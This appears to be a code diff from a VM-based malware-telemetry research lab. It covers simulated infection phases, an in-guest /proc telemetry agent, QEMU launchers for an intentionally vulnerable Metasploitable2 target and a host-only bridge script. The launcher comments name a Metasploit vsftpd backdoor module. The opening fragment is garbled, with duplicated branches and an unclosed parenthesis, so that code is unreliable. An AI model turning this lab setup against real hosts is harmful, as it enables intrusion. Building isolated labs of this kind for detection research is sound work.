if phase == "clean":
self._kill_load()
elif phase == "armed":
self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
elif phase == "infecting":
self.s.run(
"dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
"chmod +x /tmp/payload"
log.info("vm phase -> %s (profile=%s)",
phase, self.workload.profile if self.workload else "v1")
try:
if phase == "clean":
self._kill_load()
self._emit_phase("workload_killed", phase)
elif phase == "armed":
self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
self._emit_phase("workload_armed", phase)
elif phase == "infecting":
self.s.run(
"dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
"chmod +x /tmp/payload"
)
self._emit_phase("workload_infecting", phase)
elif phase == "infected_running":
self._kill_load()
if self.workload is not None:
self.s.run(self.workload.start_cmd)
else:
self.s.run(
"nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
)
self._emit_phase("workload_started", phase)
elif phase == "dormant":
# Probe BEFORE we kill so we see whether the workload
# was actually running. If the probe says nothing was
# running, the previous infected_running was a no-op
# and the trainer should filter this episode.
probe = self._probe()
self._kill_load()
self._emit_phase("workload_killed", phase, pre_kill_probe=probe)
else:
log.warning("unknown phase: %s", phase)
except Exception as e:
# Don't propagate — the runner already swallows on_phase
# exceptions. But DO record so the episode is filterable.
log.exception("set_phase(%s) failed", phase)
self.emit(
"workload_failed",
phase=phase,
error=str(e)[:200],
profile=self.workload.profile if self.workload else "v1-yes",
)
elif phase == "infected_running":
self._kill_load()
# Background CPU burner. `nohup` + `&` + redirects to detach.
self.s.run(
"nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
)
elif phase == "dormant":
self._kill_load()
else:
log.warning("unknown phase: %s", phase)
# ---- internals ------------------------------------------------------
def _kill_load(self) -> None:
# `true` at the end so the run() exit status is always 0.
if self.workload is not None:
self.s.run(self.workload.stop_cmd)
# Always sweep the v1 leftover commands too, in case we just
# switched profiles mid-fleet-run.
self.s.run("pkill yes 2>/dev/null; pkill stress-ng 2>/dev/null; true")
def _probe(self) -> dict:
"""Ask the guest what's actually running. Returns a small dict
the caller stamps into the event so trainers can detect the
"workload didn't fire" case from meta alone."""
try:
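# Count matches with `wc -l` rather than `pgrep -c`: procps prints
# 0 *and* exits non-zero when nothing matches, so a `|| echo 0`
# fallback yields "0 0", and busybox pgrep may not accept -c at all.
out = self.s.run(
"echo yes=$(pgrep yes 2>/dev/null | wc -l); "
"echo sh=$(pgrep sh 2>/dev/null | wc -l); "
"echo loadavg=$(awk '{print $1}' /proc/loadavg)"
)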
stats: dict = {}
for line in out.splitlines():
line = line.strip()
if "=" not in line:
continue
k, _, v = line.partition("=")
stats[k.strip()] = v.strip()
return stats
except Exception as e:
return {"probe_error": str(e)[:120]}
def _emit_phase(self, event: str, phase: str, **extra) -> None:
self.emit(
event,
phase=phase,
profile=self.workload.profile if self.workload else "v1-yes",
sample=self.sample.name if self.sample else None,
**extra,
)
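
The `pre_kill_probe` dict stamped into the dormant-phase `workload_killed` event is meant to let a trainer spot episodes where the workload never fired. A minimal sketch of such a check, assuming the v1 yes-loop profile (other profiles would need a different key) and a hypothetical `workload_fired` helper that the repo does not define:

```python
from __future__ import annotations


def workload_fired(probe: dict[str, str]) -> bool | None:
    """Interpret a pre_kill_probe dict for the v1 yes-loop profile.

    Returns True/False when the probe is usable, and None when it is not
    (probe_error present, or the `yes` count missing or non-numeric).
    """
    if "probe_error" in probe:
        return None
    try:
        return int(probe["yes"]) > 0
    except (KeyError, ValueError):
        return None
```

Returning `None` for unusable probes keeps "did not fire" separate from "could not tell", so a filter can drop only the episodes that are known to be empty.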


@ -0,0 +1,274 @@
#!/usr/bin/env python3
"""In-guest telemetry agent — runs INSIDE the VM.
Writes one JSON-lines row per tick to a virtio-serial port that the
host has wired up as ``cis490.guest.agent``. The host-side collector
(`collectors.guest_agent`) reads these rows and stamps them with the
host's monotonic clock before persisting to ``telemetry-guest.jsonl``.
Stdlib only: no `psutil`, no extra deps to bake into the guest. Every
field is read from /proc on the guest, so this works on busybox-based
Alpine, on Cirros, and on Metasploitable2 unchanged.
Wire path inside the guest:
/dev/virtio-ports/cis490.guest.agent
The host side opens the matching unix socket on the hypervisor.
The protocol is intentionally trivial: the agent emits newline-
delimited JSON; the host emits nothing back. One direction.
This source is the **deployable** side: every row is tagged
``available_in_deployment: true``. See docs/threat-model.md.
"""
from __future__ import annotations
import argparse
import json
import os
import platform
import sys
import time
from typing import Any
SOURCE = "guest_agent"
AVAILABLE_IN_DEPLOYMENT = True
DEFAULT_PORT = "/dev/virtio-ports/cis490.guest.agent"
DEFAULT_INTERVAL_MS = 100 # 10 Hz
DEFAULT_TOP_N = 8
# ---------- /proc parsers ---------------------------------------------------
def _read(path: str) -> str | None:
try:
with open(path, "rb") as f:
return f.read().decode("ascii", errors="replace")
except (FileNotFoundError, PermissionError):
return None
def read_loadavg() -> tuple[float, float, float] | None:
text = _read("/proc/loadavg")
if text is None:
return None
parts = text.split()
return float(parts[0]), float(parts[1]), float(parts[2])
def read_meminfo() -> dict[str, int]:
text = _read("/proc/meminfo")
out: dict[str, int] = {}
if text is None:
return out
for line in text.splitlines():
k, _, rest = line.partition(":")
v = rest.strip()
if v.endswith(" kB"):
try:
out[k] = int(v[:-3]) * 1024
except ValueError:
pass
return out
def read_cpu_total() -> dict[str, int] | None:
"""First line of /proc/stat: aggregate cpu user/nice/sys/idle/...
in jiffies since boot."""
text = _read("/proc/stat")
if text is None:
return None
line = text.splitlines()[0]
fields = line.split()
# cpu user nice system idle iowait irq softirq steal guest guest_nice
if not fields or fields[0] != "cpu":
return None
nums = [int(x) for x in fields[1:]]
pad = nums + [0] * max(0, 10 - len(nums))
return {
"user": pad[0],
"nice": pad[1],
"system": pad[2],
"idle": pad[3],
"iowait": pad[4],
"irq": pad[5],
"softirq": pad[6],
"steal": pad[7],
"guest": pad[8],
"guest_nice":pad[9],
}
def read_thermal_milli_c() -> int | None:
"""Best-effort: /sys/class/thermal/thermal_zone0/temp."""
text = _read("/sys/class/thermal/thermal_zone0/temp")
if text is None:
return None
try:
return int(text.strip())
except ValueError:
return None
def read_net_devs() -> dict[str, dict[str, int]]:
"""Parse /proc/net/dev → {iface: {rx_bytes, tx_bytes, rx_pkts, tx_pkts}}."""
text = _read("/proc/net/dev")
out: dict[str, dict[str, int]] = {}
if text is None:
return out
lines = text.splitlines()
for line in lines[2:]:
if ":" not in line:
continue
name, _, rest = line.partition(":")
name = name.strip()
if name == "lo":
continue
cols = rest.split()
if len(cols) < 16:
continue
out[name] = {
"rx_bytes": int(cols[0]),
"rx_pkts": int(cols[1]),
"tx_bytes": int(cols[8]),
"tx_pkts": int(cols[9]),
}
return out
def read_listen_ports() -> list[int]:
"""TCP listen sockets from /proc/net/tcp + tcp6. State 0A = LISTEN."""
out: set[int] = set()
for path in ("/proc/net/tcp", "/proc/net/tcp6"):
text = _read(path)
if not text:
continue
for line in text.splitlines()[1:]:
cols = line.split()
if len(cols) < 4:
continue
if cols[3] != "0A":
continue
local = cols[1] # "ADDR:PORT" with PORT in hex
_, _, port_hex = local.rpartition(":")
try:
out.add(int(port_hex, 16))
except ValueError:
pass
return sorted(out)
def read_top_procs(top_n: int) -> list[dict[str, Any]]:
"""Top-N processes by RSS. Cheap O(N) scan of /proc."""
procs: list[dict[str, Any]] = []
try:
entries = os.listdir("/proc")
except OSError:
return procs
for ent in entries:
if not ent.isdigit():
continue
pid = int(ent)
stat = _read(f"/proc/{pid}/stat")
if stat is None:
continue
try:
rparen = stat.rindex(")")
comm = stat[stat.index("(") + 1 : rparen]
fields = stat[rparen + 2:].split()
utime = int(fields[11])
stime = int(fields[12])
rss_pages = int(fields[21])
except (ValueError, IndexError):
continue
procs.append({
"pid": pid,
"comm": comm[:32],
"cpu_jiffies": utime + stime,
"rss_bytes": rss_pages * os.sysconf("SC_PAGESIZE"),
})
procs.sort(key=lambda p: p["rss_bytes"], reverse=True)
return procs[:top_n]
# ---------- one tick --------------------------------------------------------
def collect_once(top_n: int = DEFAULT_TOP_N) -> dict[str, Any]:
mem = read_meminfo()
cpu = read_cpu_total()
load = read_loadavg()
return {
"t_guest_mono_ns": time.monotonic_ns(),
"t_guest_wall_ns": time.time_ns(),
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
"kernel": platform.release(),
"cpu_total_jiffies": cpu,
"load_1m_5m_15m": list(load) if load else None,
"mem_total_bytes": (mem.get("MemTotal") or 0),
"mem_available_bytes": (mem.get("MemAvailable") or 0),
"mem_buffers_bytes": (mem.get("Buffers") or 0),
"mem_cached_bytes": (mem.get("Cached") or 0),
"swap_used_bytes": (mem.get("SwapTotal", 0) - mem.get("SwapFree", 0)),
"thermal_milli_c": read_thermal_milli_c(),
"net": read_net_devs(),
"listen_ports": read_listen_ports(),
"top_procs": read_top_procs(top_n),
}
# ---------- main loop -------------------------------------------------------
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-guest-agent")
p.add_argument("--port", default=DEFAULT_PORT,
help="virtio-serial port path inside the guest")
p.add_argument("--interval-ms", type=int, default=DEFAULT_INTERVAL_MS)
p.add_argument("--top-n", type=int, default=DEFAULT_TOP_N)
p.add_argument("--once", action="store_true",
help="emit a single row and exit (for smoke tests)")
args = p.parse_args(argv)
if args.once:
sys.stdout.write(json.dumps(collect_once(args.top_n)) + "\n")
sys.stdout.flush()
return 0
# Open the virtio-serial port. If the host hasn't wired one up,
# fall back to stdout so the agent is testable on bare-metal too.
out_fp: Any
if os.path.exists(args.port):
out_fp = open(args.port, "wb", buffering=0)
else:
sys.stderr.write(f"[cis490-agent] {args.port} missing; writing to stdout\n")
out_fp = sys.stdout.buffer
interval_ns = args.interval_ms * 1_000_000
next_tick = time.monotonic_ns()
try:
while True:
row = collect_once(args.top_n)
out_fp.write((json.dumps(row) + "\n").encode("utf-8"))
try:
out_fp.flush()
except (AttributeError, OSError):
pass
next_tick += interval_ns
sleep_ns = next_tick - time.monotonic_ns()
if sleep_ns > 0:
time.sleep(sleep_ns / 1_000_000_000)
else:
next_tick = time.monotonic_ns()
except KeyboardInterrupt:
return 0
except OSError as e:  # BrokenPipeError is a subclass of OSError
sys.stderr.write(f"[cis490-agent] write failed: {e}\n")
return 1
if __name__ == "__main__":
sys.exit(main())
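
The agent ships raw `cpu_total_jiffies` counters, so utilisation has to be derived downstream from the difference between two rows. A minimal sketch of that calculation follows; `cpu_busy_fraction` is a hypothetical consumer-side helper, not part of the agent or the host collector.

```python
from __future__ import annotations

# guest and guest_nice are already counted inside user and nice in
# /proc/stat, so they are left out of the total to avoid double counting.
_COUNTED = ("user", "nice", "system", "idle", "iowait", "irq", "softirq", "steal")


def cpu_busy_fraction(prev: dict[str, int], cur: dict[str, int]) -> float | None:
    """Fraction of CPU time spent non-idle between two snapshots."""
    total = sum(cur[k] - prev[k] for k in _COUNTED)
    if total <= 0:
        return None  # no ticks elapsed, or the counters went backwards
    idle = (cur["idle"] - prev["idle"]) + (cur["iowait"] - prev["iowait"])
    return (total - idle) / total
```

At the default 100 ms interval, and with the usual 100 ticks per second, consecutive rows differ by only about ten jiffies per CPU, so differencing rows that are further apart is likely to give a smoother signal.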


@ -16,7 +16,17 @@ set -euo pipefail
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/alpine-baseline.qcow2}"
CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm}"
# SLOT lets the fleet runner spin up N concurrent VMs without socket /
# port collisions. Default RUN_DIR + ssh hostfwd port keep single-VM
# usage unchanged.
SLOT="${SLOT:-0}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
# When BRIDGE is set, attach a tap to the host-only bridge instead of
# using SLIRP usermode networking. The tap must already exist and be a
# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
BRIDGE="${BRIDGE:-}"
TAP="${TAP:-cis490tap$SLOT}"
mkdir -p "$RUN_DIR"
QMP_SOCK="$RUN_DIR/qmp.sock"
@ -32,8 +42,14 @@ if [[ ! -f "$CIDATA" ]]; then
exit 1
fi
AGENT_SOCK="$RUN_DIR/agent.sock"
# snapshot=on routes guest writes through a temporary overlay so the qcow2
# on disk is never mutated — every boot starts from the same bytes.
#
# Second virtio-serial port (cis490.guest.agent) carries telemetry
# from the in-guest agent. Surfaces inside the guest at
# /dev/virtio-ports/cis490.guest.agent and on the host at $AGENT_SOCK.
exec qemu-system-x86_64 \
-name cis490-vm \
-machine q35,accel=kvm \
@ -42,8 +58,15 @@ exec qemu-system-x86_64 \
-m 256 \
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
-drive file="$CIDATA",format=raw,if=virtio,readonly=on \
-netdev user,id=n0,hostfwd=tcp:127.0.0.1:2222-:22 \
$(if [[ -n "$BRIDGE" ]]; then \
echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
else \
echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
fi) \
-device virtio-net-pci,netdev=n0 \
-device virtio-serial-pci,id=cis490vs0 \
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
-device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
-nographic \
-serial unix:"$RUN_DIR/serial.sock",server=on,wait=off \
-monitor unix:"$MON_SOCK",server=on,wait=off \

117
vm/launch_target.sh Executable file

@ -0,0 +1,117 @@
#!/usr/bin/env bash
# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the
# exploit fires against). Companion to ``launch_demo.sh``, which boots
# the *idle* Alpine guest used in Tiers 1-2.
#
# Networking note: this launcher uses SLIRP usermode networking with
# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port.
# That gives us:
# - the host can reach the guest's services (for msfrpcd + the
# exploit module to drive ``RHOSTS=127.0.0.1``)
# - the guest cannot reach the host or the internet (no NAT exit)
#
# The host-only ``br-malware`` bridge described in docs/architecture.md
# replaces SLIRP once the bridge-side pcap collector (source 4) lands —
# at which point payloads with ``reverse_tcp`` callbacks become viable
# too. Until then, we restrict module choices to ones that return a
# shell on the same socket they exploit (e.g. vsftpd_234_backdoor).
#
# Run-dir contract (read by run_tier3_demo.py):
# $RUN_DIR/qemu.pid
# $RUN_DIR/qmp.sock
# $RUN_DIR/monitor.sock
# $RUN_DIR/serial.sock
set -euo pipefail
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
SLOT="${SLOT:-0}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
RAM_MIB="${RAM_MIB:-512}"
# When BRIDGE is set, attach a tap to the host-only bridge instead of
# using SLIRP. Pcap-feature episodes (source 4) require this.
BRIDGE="${BRIDGE:-}"
TAP="${TAP:-cis490target$SLOT}"
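# Ports the host should forward to the guest. Comma-separated host:guest pairs.
# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
# Host ports below 1024 are privileged by default on Linux, so the default
# mapping for slots 0-10 needs root or CAP_NET_BIND_SERVICE to bind.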
PORT_BASE="${PORT_BASE:-$((21 + SLOT * 100))}"
TARGET_PORTS="${TARGET_PORTS:-${PORT_BASE}:21}"
# KVM if the host can take it; otherwise fall back to TCG. Cross-arch
# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG.
ACCEL="${ACCEL:-}"
mkdir -p "$RUN_DIR"
QMP_SOCK="$RUN_DIR/qmp.sock"
MON_SOCK="$RUN_DIR/monitor.sock"
PID_FILE="$RUN_DIR/qemu.pid"
SERIAL_SOCK="$RUN_DIR/serial.sock"
if [[ ! -f "$IMAGE" ]]; then
cat >&2 <<EOF
no target image at $IMAGE
Drop a vulnerable Linux qcow2 there. The canonical choice is
Metasploitable2 — see docs/sources.md for the download + sha256.
If the image is x86 and your host is not, set ACCEL=tcg explicitly.
EOF
exit 1
fi
# Build the netdev string. With BRIDGE set we use a tap on the host-only
# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
# usermode + restrict=on for the no-egress smoke runs.
if [[ -n "$BRIDGE" ]]; then
NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
else
NETDEV="user,id=n0,restrict=on"
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
for pair in "${_PAIRS[@]}"; do
host_port="${pair%%:*}"
guest_port="${pair##*:}"
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
done
fi
# Pick acceleration: explicit override wins; otherwise use KVM if the
# device is present, else TCG.
if [[ -z "$ACCEL" ]]; then
if [[ -e /dev/kvm && -r /dev/kvm && -w /dev/kvm ]]; then
ACCEL="kvm"
else
ACCEL="tcg"
fi
fi
CPU_FLAGS=()
if [[ "$ACCEL" == "kvm" ]]; then
CPU_FLAGS=(-cpu host)
fi
AGENT_SOCK="$RUN_DIR/agent.sock"
# snapshot=on so the qcow2 is never mutated — every boot is identical.
# Second virtio-serial port carries the in-guest agent's telemetry to
# the host (see vm/guest-agent/). Targets without the agent installed
# (e.g. unmodified Metasploitable2) leave the device unused — the
# host-side collector simply gets no rows. Harmless.
exec qemu-system-x86_64 \
-name cis490-target \
-machine q35,accel="$ACCEL" \
"${CPU_FLAGS[@]}" \
-smp 1,sockets=1,cores=1,threads=1 \
-m "$RAM_MIB" \
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
-netdev "$NETDEV" \
-device virtio-net-pci,netdev=n0 \
-device virtio-serial-pci,id=cis490vs0 \
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
-device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
-nographic \
-serial unix:"$SERIAL_SOCK",server=on,wait=off \
-monitor unix:"$MON_SOCK",server=on,wait=off \
-qmp unix:"$QMP_SOCK",server=on,wait=off \
-pidfile "$PID_FILE" \
-display none
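
The per-slot port arithmetic is easy to get wrong when driving the launchers from Python. A minimal sketch that mirrors the shell logic above (`SSH_PORT = 2222 + SLOT` in `launch_demo.sh`, `PORT_BASE = 21 + SLOT * 100` and the `hostfwd` loop in `launch_target.sh`) follows. `ssh_port` and `target_netdev` are hypothetical helper names, not functions the repo defines.

```python
from __future__ import annotations


def ssh_port(slot: int, base: int = 2222) -> int:
    """launch_demo.sh default: SSH_PORT = 2222 + SLOT."""
    return base + slot


def target_netdev(slot: int, target_ports: str | None = None) -> str:
    """Rebuild the SLIRP -netdev value the way launch_target.sh does."""
    if target_ports is None:
        # Default TARGET_PORTS: "<PORT_BASE>:21" with PORT_BASE = 21 + SLOT*100
        target_ports = f"{21 + slot * 100}:21"
    netdev = "user,id=n0,restrict=on"
    for pair in target_ports.split(","):
        host_port, _, guest_port = pair.partition(":")
        netdev += f",hostfwd=tcp:127.0.0.1:{host_port}-:{guest_port}"
    return netdev
```

For example, `target_netdev(2)` forwards host port 221 to guest port 21, which is the value a caller would pass as `--target-port` for that slot.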

56
vm/setup_bridge.sh Executable file

@ -0,0 +1,56 @@
#!/usr/bin/env bash
# Create the host-only ``br-malware`` bridge for Tier-3+ episodes.
#
# Properties (from docs/architecture.md):
# - Bridge address 10.200.0.1/24 on the host side.
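# - NO NAT, NO route, NO DNS: guests cannot reach the LAN or the
# internet. The bridge only carries traffic between the host's
# bridge address and the guests on it.
# - Lab-host and target VMs both attach via tap devices. The launchers
# pass script=no, so they do not add the tap to the bridge; the
# operator does that (see the BRIDGE/TAP notes in vm/launch_demo.sh).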
#
# Run as root, ONCE per host. Idempotent — re-running is safe.
set -euo pipefail
BRIDGE="${BRIDGE:-br-malware}"
BRIDGE_IP="${BRIDGE_IP:-10.200.0.1/24}"
log() { printf '[setup_bridge] %s\n' "$*" >&2; }
[[ $EUID -eq 0 ]] || { log "must run as root"; exit 1; }
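if ! command -v ip >/dev/null; then
# Single quotes, not backticks: backticks inside double quotes would
# run `ip` as a command substitution instead of printing its name.
log "iproute2 ('ip') is required"
exit 1
fi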
if ! ip link show "$BRIDGE" >/dev/null 2>&1; then
log "creating bridge $BRIDGE"
ip link add name "$BRIDGE" type bridge
# Disable spanning-tree on the host-only bridge — it isn't needed
# and adds startup delay.
ip link set "$BRIDGE" type bridge stp_state 0
fi
ip link set "$BRIDGE" up
# Add the host-side address if not already there.
# -F matches the dots literally; -w keeps 10.200.0.1 from matching 10.200.0.10.
if ! ip -4 addr show dev "$BRIDGE" | grep -qwF "${BRIDGE_IP%%/*}"; then
log "adding $BRIDGE_IP to $BRIDGE"
ip addr add "$BRIDGE_IP" dev "$BRIDGE"
fi
# The kernel must NOT forward between this bridge and any other
# interface. This script only warns: if net.ipv4.ip_forward is enabled,
# a firewall rule has to keep the malware bridge from leaking to the LAN.
if [[ "$(cat /proc/sys/net/ipv4/ip_forward)" == "1" ]]; then
log "WARNING: net.ipv4.ip_forward=1 — make sure iptmonads / nftables"
log "blocks traffic from $BRIDGE to non-loopback devices."
fi
log "bridge ready: $(ip -4 -br addr show "$BRIDGE")"
log ""
log "Launchers can now opt into tap+bridge mode by setting:"
log " BRIDGE=$BRIDGE (tells launch_target.sh to attach a tap to this bridge)"
log "Default launcher behaviour stays SLIRP usermode for simplicity."